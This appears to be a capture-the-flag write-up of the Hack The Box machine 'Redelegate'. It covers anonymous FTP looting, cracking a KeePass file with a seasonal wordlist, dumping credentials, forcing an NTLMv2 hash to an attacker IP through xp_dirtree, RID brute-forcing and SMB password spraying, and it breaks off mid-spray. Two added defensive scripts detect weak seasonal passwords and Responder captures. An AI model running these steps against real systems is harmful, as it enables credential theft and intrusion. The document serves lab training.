Redelegate

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nmap 10.129.130.206 -p 21,53,80,88,135,139,389,445,464,593,636,1433,3268,3269,3389,5985,9389  -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 09:17 EDT
Nmap scan report for DC.redelegate.vl (10.129.130.206)
Host is up (0.11s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24  01:11AM                  434 CyberAudit.txt
| 10-20-24  05:14AM                 2622 Shared.kdbx
|_10-20-24  01:26AM                  580 TrainingAgenda.txt
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-13 13:17:19Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   10.129.130.206:1433:
|     Target_Name: REDELEGATE
|     NetBIOS_Domain_Name: REDELEGATE
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: redelegate.vl
|     DNS_Computer_Name: dc.redelegate.vl
|     DNS_Tree_Name: redelegate.vl
|_    Product_Version: 10.0.20348
|_ssl-date: 2025-10-13T13:17:34+00:00; +1s from scanner time.
| ms-sql-info:
|   10.129.130.206:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-13T13:06:14
|_Not valid after:  2055-10-13T13:06:14
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.redelegate.vl
| Not valid before: 2025-10-12T13:03:33
|_Not valid after:  2026-04-13T13:03:33
|_ssl-date: 2025-10-13T13:17:34+00:00; +1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: REDELEGATE
|   NetBIOS_Domain_Name: REDELEGATE
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: redelegate.vl
|   DNS_Computer_Name: dc.redelegate.vl
|   DNS_Tree_Name: redelegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-13T13:17:26+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-10-13T13:17:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.75 seconds

1.1.2. ftp

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# ftp 10.129.130.206
Connected to 10.129.130.206.
220 Microsoft FTP Service
Name (10.129.130.206:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
>>>> ftp> binary
200 Type set to I.
ftp> ls -la
229 Entering Extended Passive Mode (|||49753|)
125 Data connection already open; Transfer starting.
10-20-24  01:11AM                  434 CyberAudit.txt
10-20-24  05:14AM                 2622 Shared.kdbx
10-20-24  01:26AM                  580 TrainingAgenda.txt
Warning

When downloading files over FTP, be sure to switch to binary mode first; otherwise a file transferred from a Windows FTP server to Linux has line-ending problems on Linux. Once you switch to binary mode, the line endings of the downloaded file are handled automatically.

1.1.3. CyberAudit.txt

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# cat CyberAudit.txt
OCTOBER 2024 AUDIT FINDINGS

[!] CyberSecurity Audit findings:

1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs

[*] Remediation steps:

>>>> 1) Prompt users to change their passwords: DONE #so users may still have weak passwords
1) Check privileges for all users and remove high privileges: DONE
>>>> 1) Remove unused objects in the domain: IN PROGRESS #unused objects still exist
>>>> 2) Recheck ACLs: IN PROGRESS #dangerous ACLs still exist

1.1.4. TrainingAgenda.txt

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# cat TrainingAgenda.txt
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)

Friday 4th October  | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one


Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?


Friday 18th October | 11.30 - 13.30 - 7 attendees
>>>> "Weak Passwords" - Why "SeasonYear!" is not a good password


Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them

1.1.5. keepass

Try decrypting it with weak passwords:

Autumn2024!
Fall2024!
October2024!
Winter2024!
Spring2024!
Summer2024!
Autumn2023!
Fall2023!
October2023!
Winter2023!
Spring2023!
Summer2023!
September2024!
November2024!
December2024!
Autumn2024!!
Fall2024!!
October2024!!
Autumn24!
Fall24!
October24!
Winter24!
Spring24!
Summer24!
Autumn@2024
Fall@2024
October@2024
Winter@2024
Autumn2024@
Fall2024@
October2024@
Autumn2024#
Fall2024#
October2024#
Winter2024#
Password2024!
Welcome2024!
Redelegate2024!
CyberAudit2024!
Training2024!
Security2024!
January2024!
February2024!
March2024!
April2024!
May2024!
June2024!
July2024!
August2024!
Spring2024!
Summer2024!
Fall2024!
Autumn2024!
Winter2024!
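The training agenda above says it outright: "SeasonYear!" is not a good password, and the wordlist that cracks the KeePass database is nothing but that pattern. The following is an added example (my own code, not part of the writeup) that a defender can drop into a password-filter or audit script to reject exactly this family: a season or month name, an optional symbol run on either side, and a two- or four-digit year close to the current one. The reference year and the symbol set are assumptions.

```python
import re
from datetime import date

# Season and month names that show up in "SeasonYear!"-style passwords.
SEASONS = ["spring", "summer", "autumn", "fall", "winter"]
MONTHS = ["january", "february", "march", "april", "may", "june", "july",
          "august", "september", "october", "november", "december"]
# Symbol run users append or prepend to satisfy complexity rules (assumed set).
_SYMBOLS = r"[!@#$%^&*._-]*"

_PATTERN = re.compile(
    r"^" + _SYMBOLS
    + r"(?P<word>" + "|".join(SEASONS + MONTHS) + r")"
    + _SYMBOLS
    + r"(?P<year>\d{4}|\d{2})"
    + _SYMBOLS + r"$",
    re.IGNORECASE,
)


def seasonal_pattern(password, reference_year=None, window=2):
    """Return (word, year) when `password` is a season/month name plus a year
    within `window` years of `reference_year`, else None.

    Two-digit years are expanded into the 2000s ('Fall24!' -> 2024). A year far
    from the reference ('Winter1999!') is weak for other reasons but is not
    reported as this pattern, so the check stays precise."""
    if reference_year is None:
        reference_year = date.today().year
    m = _PATTERN.match(password)
    if not m:
        return None
    year_text = m.group("year")
    year = int(year_text) + 2000 if len(year_text) == 2 else int(year_text)
    if abs(year - reference_year) > window:
        return None
    return (m.group("word").lower(), year)


def audit_passwords(candidates, reference_year):
    """Split candidates into (flagged, clean) lists using seasonal_pattern()."""
    flagged, clean = [], []
    for pw in candidates:
        (flagged if seasonal_pattern(pw, reference_year) else clean).append(pw)
    return flagged, clean


if __name__ == "__main__":
    # A few entries from the wordlist above plus the KeePass-stored secrets.
    sample = ["Fall2024!", "Autumn@2024", "Fall24!", "October2023#",
              "Password2024!", "Redelegate2024!", "SguPZBKdRyxWzvXRWy6U"]
    flagged, clean = audit_passwords(sample, reference_year=2024)
    print("seasonal:", flagged)
    print("other:   ", clean)
```

Run on the list above with `reference_year=2024`, every `Season2024!`/`Month2024!`/`Fall24!` variant is flagged while `Password2024!` and the random KeePass secrets pass through untouched, which is the split a filter should make.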
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# cat keepass.hash
Shared:$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# john --wordlist=passwords.txt keepass.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Fall2024!        (Shared)
1g 0:00:00:00 DONE (2025-10-13 10:25) 1.369g/s 43.83p/s 43.83c/s 43.83C/s Autumn2024!..Autumn2024#
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# keepassxc-cli export  Shared.kdbx --format csv
Enter password to unlock Shared.kdbx:
KdbxXmlReader::readDatabase: found 1 invalid group reference(s)
"Group","Title","Username","Password","URL","Notes","TOTP","Icon","Last Modified","Created"
"Shared/IT","FTP","FTPUser","SguPZBKdRyxWzvXRWy6U","","Deprecated","","0","2024-10-20T07:56:58Z","2024-10-20T07:56:20Z"
"Shared/IT","FS01 Admin","Administrator","Spdv41gg4BlBgSYIW1gF","","","","0","2024-10-20T07:57:21Z","2024-10-20T07:57:02Z"
"Shared/IT","WEB01","WordPress Panel","cn4KOEgsHqvKXPjEnSD9","","","","0","2024-10-20T08:00:25Z","2024-10-20T07:57:24Z"
"Shared/IT","SQL Guest Access","SQLGuest","zDPBpaF4FywlqIv11vii","","","","0","2024-10-20T08:27:09Z","2024-10-20T08:26:48Z"
"Shared/HelpDesk","KeyFob Combination","","22331144","","","","0","2024-10-20T12:12:32Z","2024-10-20T12:12:09Z"
"Shared/Finance","Timesheet Manager","Timesheet","hMFS4I0Kj8Rcd62vqi5X","","","","0","2024-10-20T12:14:18Z","2024-10-20T12:13:30Z"
"Shared/Finance","Payrol App","Payroll","cVkqz4bCM7kJRSNlgx2G","","","","0","2024-10-20T12:14:11Z","2024-10-20T12:13:50Z"
FTPUser SguPZBKdRyxWzvXRWy6U
Administrator Spdv41gg4BlBgSYIW1gF
WordPress Panel cn4KOEgsHqvKXPjEnSD9
SQLGuest zDPBpaF4FywlqIv11vii
Timesheet hMFS4I0Kj8Rcd62vqi5X
Payroll cVkqz4bCM7kJRSNlgx2G

1.2. mssql

Adding --local-auth lets us authenticate to MSSQL.

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc mssql  DC.redelegate.vl -u users.txt -p pass.txt --no-bruteforce --local-auth
MSSQL       10.129.130.206  1433   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL       10.129.130.206  1433   DC               [-] DC\FTPUser:SguPZBKdRyxWzvXRWy6U (Login failed for user 'FTPUser'. Please try again with or without '--local-auth')
MSSQL       10.129.130.206  1433   DC               [-] DC\Administrator:Spdv41gg4BlBgSYIW1gF (Login failed for user 'Administrator'. Please try again with or without '--local-auth')
MSSQL       10.129.130.206  1433   DC               [-] DC\WordPress:Panel (Login failed for user 'WordPress'. Please try again with or without '--local-auth')
MSSQL       10.129.130.206  1433   DC               [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# impacket-mssqlclient  'SQLGuest:zDPBpaF4FywlqIv11vii@DC.redelegate.vl'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SQLGuest  guest@master)>

The guest user isn't much use.
Let's try capturing a hash with Responder.

xp_dirtree \\10.10.14.58\share

[SMB] NTLMv2-SSP Client   : 10.129.130.206
[SMB] NTLMv2-SSP Username : REDELEGATE\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc[... hash omitted ...]

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::REDELEGATE:1122334455667788:1ec3154e5a531e...000000
Time.Started.....: Mon Oct 13 22:45:38 2025 (1 sec)
Time.Estimated...: Mon Oct 13 22:45:39 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 17858.0 kH/s (2.45ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344388/14344388 (100.00%)
Rejected.........: 0/14344388 (0.00%)
Restore.Point....: 14344388/14344388 (100.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 0213ade -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Temp: 47c Util: 24% Core:1890MHz Mem:8001MHz Bus:8
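The hashcat target line above shows the server challenge `1122334455667788`. That is Responder's fixed default challenge, whereas a real SMB server draws a fresh random challenge per exchange, so that constant in a NetNTLMv2 line or a packet capture is a reliable sign of a rogue-listener capture. Below is an added example (my own code, not from the writeup) that parses a hashcat mode-5600 line, flags that challenge, and decodes the AV pairs inside the client blob, which tell a responder which host the victim believed it was talking to. The sample line is constructed (zeroed NTProofStr, made-up client challenge and timestamp); the real hash is not reproduced here.

```python
import struct
from datetime import datetime, timedelta, timezone

# Responder's well-known default NTLM server challenge. A genuine server picks a
# fresh random challenge per exchange, so this exact value in a capture is a
# strong indicator of a rogue-listener hash capture.
RESPONDER_DEFAULT_CHALLENGE = "1122334455667788"

# MS-NLMP AV_PAIR ids carried in the NTLMv2 client blob.
AV_PAIR_NAMES = {
    1: "NetBIOS computer name", 2: "NetBIOS domain name",
    3: "DNS computer name", 4: "DNS domain name", 5: "DNS tree name",
    6: "Flags", 7: "Timestamp", 9: "Target name",
}
_STRING_AV_IDS = (1, 2, 3, 4, 5, 9)


def _filetime_to_datetime(ft):
    # FILETIME counts 100 ns intervals since 1601-01-01 UTC.
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_netntlmv2(line):
    """Parse a hashcat mode-5600 line (USER::DOMAIN:challenge:proof:blob) and
    decode the NTLMv2 client blob (MS-NLMP NTLMv2_CLIENT_CHALLENGE)."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    if blob[:4] != b"\x01\x01\x00\x00":        # RespType, HiRespType, Reserved1
        raise ValueError("not an NTLMv2 client blob")
    filetime = struct.unpack_from("<Q", blob, 8)[0]
    client_challenge = blob[16:24].hex()
    av_pairs, pos = {}, 28                     # AV pairs start after Reserved3
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:                         # MsvAvEOL
            break
        value = blob[pos:pos + av_len]
        pos += av_len
        name = AV_PAIR_NAMES.get(av_id, f"AvId {av_id}")
        av_pairs[name] = value.decode("utf-16-le") if av_id in _STRING_AV_IDS else value.hex()
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge.lower(),
        "responder_default_challenge": server_challenge.lower() == RESPONDER_DEFAULT_CHALLENGE,
        "nt_proof": nt_proof,
        "timestamp": _filetime_to_datetime(filetime),
        "client_challenge": client_challenge,
        "av_pairs": av_pairs,
    }


def build_sample_line():
    """Constructed sample in the page's format; not the captured hash."""
    av = b""
    for av_id, text in [(2, "REDELEGATE"), (1, "DC"), (4, "redelegate.vl"), (3, "dc.redelegate.vl")]:
        value = text.encode("utf-16-le")
        av += struct.pack("<HH", av_id, len(value)) + value
    av += struct.pack("<HH", 0, 0)             # MsvAvEOL
    filetime = 133700000000000000              # constructed: 2024-09-05 08:53:20 UTC
    blob = (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", filetime)
            + bytes.fromhex("a1b2c3d4e5f60718") + b"\x00" * 4 + av + b"\x00" * 4)
    return f"SQL_SVC::REDELEGATE:{RESPONDER_DEFAULT_CHALLENGE}:{'00' * 16}:{blob.hex()}"


if __name__ == "__main__":
    parsed = parse_netntlmv2(build_sample_line())
    for key, value in parsed.items():
        print(f"{key:28} {value}")
```

The AV pairs are the forensic payoff: the timestamp dates the capture independently of the listener's clock, and the computer/domain names identify the account's own machine, which is what an IR team needs to trace the outbound SMB connection that the `xp_dirtree` call triggered.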

Because this is a SQL Server local account, I can't forge a silver ticket with it either.

Enumerate the domain users, then spray the passwords against them.

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc mssql  DC.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii  --local-auth --rid-brute 9999
MSSQL       10.129.130.206  1433   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL       10.129.130.206  1433   DC               [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
MSSQL       10.129.130.206  1433   DC               498: REDELEGATE\Enterprise Read-only Domain Controllers
MSSQL       10.129.130.206  1433   DC               500: WIN-Q13O908QBPG\Administrator
MSSQL       10.129.130.206  1433   DC               501: REDELEGATE\Guest
MSSQL       10.129.130.206  1433   DC               502: REDELEGATE\krbtgt
MSSQL       10.129.130.206  1433   DC               512: REDELEGATE\Domain Admins
MSSQL       10.129.130.206  1433   DC               513: REDELEGATE\Domain Users
MSSQL       10.129.130.206  1433   DC               514: REDELEGATE\Domain Guests
MSSQL       10.129.130.206  1433   DC               515: REDELEGATE\Domain Computers
MSSQL       10.129.130.206  1433   DC               516: REDELEGATE\Domain Controllers
MSSQL       10.129.130.206  1433   DC               517: REDELEGATE\Cert Publishers
MSSQL       10.129.130.206  1433   DC               518: REDELEGATE\Schema Admins
MSSQL       10.129.130.206  1433   DC               519: REDELEGATE\Enterprise Admins
MSSQL       10.129.130.206  1433   DC               520: REDELEGATE\Group Policy Creator Owners
MSSQL       10.129.130.206  1433   DC               521: REDELEGATE\Read-only Domain Controllers
MSSQL       10.129.130.206  1433   DC               522: REDELEGATE\Cloneable Domain Controllers
MSSQL       10.129.130.206  1433   DC               525: REDELEGATE\Protected Users
MSSQL       10.129.130.206  1433   DC               526: REDELEGATE\Key Admins
MSSQL       10.129.130.206  1433   DC               527: REDELEGATE\Enterprise Key Admins
MSSQL       10.129.130.206  1433   DC               553: REDELEGATE\RAS and IAS Servers
MSSQL       10.129.130.206  1433   DC               571: REDELEGATE\Allowed RODC Password Replication Group
MSSQL       10.129.130.206  1433   DC               572: REDELEGATE\Denied RODC Password Replication Group
MSSQL       10.129.130.206  1433   DC               1000: REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
MSSQL       10.129.130.206  1433   DC               1002: REDELEGATE\DC$
MSSQL       10.129.130.206  1433   DC               1103: REDELEGATE\FS01$
MSSQL       10.129.130.206  1433   DC               1104: REDELEGATE\Christine.Flanders
MSSQL       10.129.130.206  1433   DC               1105: REDELEGATE\Marie.Curie
MSSQL       10.129.130.206  1433   DC               1106: REDELEGATE\Helen.Frost
MSSQL       10.129.130.206  1433   DC               1107: REDELEGATE\Michael.Pontiac
MSSQL       10.129.130.206  1433   DC               1108: REDELEGATE\Mallory.Roberts
MSSQL       10.129.130.206  1433   DC               1109: REDELEGATE\James.Dinkleberg
MSSQL       10.129.130.206  1433   DC               1112: REDELEGATE\Helpdesk
MSSQL       10.129.130.206  1433   DC               1113: REDELEGATE\IT
MSSQL       10.129.130.206  1433   DC               1114: REDELEGATE\Finance
MSSQL       10.129.130.206  1433   DC               1115: REDELEGATE\DnsAdmins
MSSQL       10.129.130.206  1433   DC               1116: REDELEGATE\DnsUpdateProxy
MSSQL       10.129.130.206  1433   DC               1117: REDELEGATE\Ryan.Cooper
MSSQL       10.129.130.206  1433   DC               1119: REDELEGATE\sql_svc
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc smb DC.redelegate.vl -u valid_user.txt -p passwords.txt --continue-on-success
SMB         10.129.130.206  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DC$:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\FS01$:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Christine.Flanders:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [+]  REDELEGATE\Marie.Curie:Fall2024!
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helen.Frost:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Michael.Pontiac:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Mallory.Roberts:Fall2024! STATUS_ACCOUNT_RESTRICTION
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\James.Dinkleberg:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helpdesk:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\IT:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Finance:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsAdmins:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsUpdateProxy:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Ryan.Cooper:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\sql_svc:Fall2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DC$:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\FS01$:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Christine.Flanders:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helen.Frost:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Michael.Pontiac:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Mallory.Roberts:Winter2024! STATUS_ACCOUNT_RESTRICTION
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\James.Dinkleberg:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helpdesk:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\IT:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Finance:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsAdmins:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsUpdateProxy:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Ryan.Cooper:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\sql_svc:Winter2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DC$:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\FS01$:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Christine.Flanders:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helen.Frost:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Michael.Pontiac:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Mallory.Roberts:Spring2024! STATUS_ACCOUNT_RESTRICTION
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\James.Dinkleberg:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helpdesk:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\IT:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Finance:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsAdmins:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsUpdateProxy:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Ryan.Cooper:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\sql_svc:Spring2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DC$:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\FS01$:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Christine.Flanders:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helen.Frost:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Michael.Pontiac:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Mallory.Roberts:Summer2024! STATUS_ACCOUNT_RESTRICTION
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\James.Dinkleberg:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helpdesk:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\IT:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Finance:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsAdmins:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsUpdateProxy:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Ryan.Cooper:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\sql_svc:Summer2024! STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DC$:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\FS01$:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Christine.Flanders:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helen.Frost:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Michael.Pontiac:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Mallory.Roberts:SguPZBKdRyxWzvXRWy6U STATUS_ACCOUNT_RESTRICTION
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\James.Dinkleberg:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helpdesk:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\IT:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Finance:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsAdmins:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
